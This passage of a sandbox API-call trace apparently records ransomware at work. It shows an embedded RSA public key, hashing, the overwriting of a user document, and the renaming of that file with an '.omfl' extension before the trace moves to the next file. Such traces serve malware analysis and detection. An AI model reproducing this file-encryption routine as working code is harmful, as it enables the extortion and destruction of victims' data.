KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.316] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.316] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0132.317] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.317] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.317] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.317] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.317] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.317] GetLastError () returned 0x0 [0132.317] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.317] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0132.317] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.317] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.317] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.317] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.317] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.317] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.317] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.317] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x68d0) returned 0xdd35410 [0132.318] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.318] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dba30 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17388 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dba78 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173a0 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173d0 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173e8 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.318] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.318] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173d0 | out: hHeap=0x4970000) returned 1 [0132.318] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173e8 | out: hHeap=0x4970000) returned 1 [0132.318] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.318] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.318] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd173e8 [0132.318] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd173d0 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173e8 | out: hHeap=0x4970000) returned 1 [0132.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173d0 | out: hHeap=0x4970000) returned 1 [0132.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.319] GetCurrentThreadId () returned 0x618 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579830 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.319] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.320] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.320] GetCurrentThreadId () returned 0x618 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.320] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.320] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.320] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.320] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.320] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.320] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173d0 [0132.320] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0132.320] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd173e8 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173b8 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17400 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173d0 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd173d0 [0132.321] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.321] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.322] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.322] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.322] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0132.322] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173d0 | out: hHeap=0x4970000) returned 1 [0132.322] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0132.322] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17400 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.322] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173e8 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173b8 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173a0 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dba78 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.323] WriteFile (in: hFile=0x610, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x68c3, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x68c3, lpOverlapped=0x0) returned 1 [0132.323] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0132.324] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x68c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.324] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.324] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.324] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0132.324] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0132.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0132.324] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0x757b548 [0132.324] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0132.324] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5a18 | out: hHeap=0x4970000) returned 1 [0132.324] WriteFile (in: hFile=0x610, lpBuffer=0x757b548*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x757b548*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0132.324] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b548 | out: hHeap=0x4970000) returned 1 [0132.324] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.324] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.324] CloseHandle (hObject=0x610) returned 1 [0132.326] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.326] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x74fb288 [0132.326] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0132.326] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\aIf79i Cemgu-.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\aif79i cemgu-.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\aIf79i Cemgu-.odp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\aif79i cemgu-.odp.omfl")) returned 1 [0132.327] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.327] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.327] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.329] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3f654e0, ftCreationTime.dwHighDateTime=0x1d5d941, ftLastAccessTime.dwLowDateTime=0x9a258eb0, ftLastAccessTime.dwHighDateTime=0x1d5e17a, ftLastWriteTime.dwLowDateTime=0x9a258eb0, ftLastWriteTime.dwHighDateTime=0x1d5e17a, nFileSizeHigh=0x0, nFileSizeLow=0xb8f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GqqvBqOHVEd.ppt", cAlternateFileName="GQQVBQ~1.PPT")) returned 1 [0132.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0132.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0132.329] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5a18 | out: hHeap=0x4970000) returned 1 [0132.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\GqqvBqOHVEd.ppt") returned=".ppt" [0132.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\GqqvBqOHVEd.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\gqqvbqohved.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.329] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=2959) returned 1 [0132.329] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.334] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xb69, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.334] ReadFile (in: hFile=0x610, 